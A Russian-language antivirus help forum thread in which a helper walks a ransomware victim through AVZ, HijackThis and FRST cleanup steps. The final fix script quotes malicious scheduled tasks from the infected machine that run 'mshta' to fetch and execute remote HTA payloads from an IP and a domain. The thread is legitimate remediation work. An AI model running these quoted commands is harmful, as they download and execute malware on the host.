G1ueck 0 Опубликовано 26 февраля, 2019 Share Опубликовано 26 февраля, 2019 (изменено) Здравствуйте, зашифрованы файлы на сервере. Интересует возможность восстановления/дешифрации файлов. Логи согласно правилам оформления запроса о помощи во вложении. CollectionLog-2019.02.25-18.21.zip Изменено 26 февраля, 2019 пользователем G1ueck Ссылка на сообщение Поделиться на другие сайты
Sandor 1 296 Опубликовано 26 февраля, 2019 Share Опубликовано 26 февраля, 2019 Здравствуйте! Интересует возможность восстановления/дешифрации файловК сожалению, у нас такой возможности нет. Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО. Выполните скрипт в AVZ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); QuarantineFile('C:\Users\User3\AppData\Roaming\Microsoft\del.ps1', ''); QuarantineFile('C:\Users\User3\AppData\Roaming\Microsoft\Network\PrivFalse.bat', ''); DeleteSchedulerTask('OneDrive Sync'); DeleteSchedulerTask('Optimize Start Menu Cache Files-S-3-5-21-2236678155-433519125-1142214968-1037'); DeleteSchedulerTask('Optimize Start Menu Cache Files-S-3-5-21-2236678155-433519125-1142214968-1137'); DeleteSchedulerTask('Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237'); DeleteSchedulerTask('Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1337'); DeleteFile('C:\Users\User3\AppData\Roaming\Microsoft\del.ps1', '64'); DeleteFile('C:\Users\User3\AppData\Roaming\Microsoft\Network\PrivFalse.bat', '64'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; end. Пожалуйста, перезагрузите компьютер вручную. Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com Полученный ответ сообщите здесь (с указанием номера KLAN). Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Прикрепите к следующему сообщению свежий CollectionLog. Ссылка на сообщение Поделиться на другие сайты
G1ueck 0 Опубликовано 27 февраля, 2019 Автор Share Опубликовано 27 февраля, 2019 Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.comПолученный ответ сообщите здесь (с указанием номера KLAN). Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Прикрепите к следующему сообщению свежий CollectionLog. KLAN-9680568597 В антивирусных базах информация по присланным вами файлам отсутствует: del.ps1 Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте. CollectionLog-2019.02.27-11.08.zip Ссылка на сообщение Поделиться на другие сайты
Sandor 1 296 Опубликовано 27 февраля, 2019 Share Опубликовано 27 февраля, 2019 "Пофиксите" в HijackThis: O1 - Hosts: Reset contents to default O4 - Startup other users: C:\Users\User3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_RETURN_FILES.txt O4 - Startup other users: C:\Users\User7\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\abb278f5f94f5be17c28e4761048b650.exe -> (PE EXE) Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Нажмите кнопку Scan. После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. Подробнее читайте в этом руководстве. Ссылка на сообщение Поделиться на другие сайты
G1ueck 0 Опубликовано 3 марта, 2019 Автор Share Опубликовано 3 марта, 2019 Прикрепите отчеты к своему следующему сообщению. FRST.txt Addition.txt Ссылка на сообщение Поделиться на другие сайты
Sandor 1 296 Опубликовано 4 марта, 2019 Share Опубликовано 4 марта, 2019 Отключите до перезагрузки антивирус. Выделите следующий код: Start:: GroupPolicy: Restriction ? <==== ATTENTION GroupPolicy\User: Restriction ? <==== ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION Task: {5D0E0807-9631-41BF-AC21-C10BCD3BD88E} - System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142314968-1037 => C:\Windows\System32\cmd.exe /c mshta hxxp://107.181.160.197/win/checking.hta <==== ATTENTION Task: {B4CFD127-2AA4-4296-8433-6CC33A7129B5} - System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1137 => C:\Windows\System32\cmd.exe /c mshta hxxp://asq.r77vh0.pw/win/checking.hta <==== ATTENTION End:: Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST (FRST64) от имени администратора. Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Перезагрузите компьютер вручную. Подробнее читайте в этом руководстве. Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти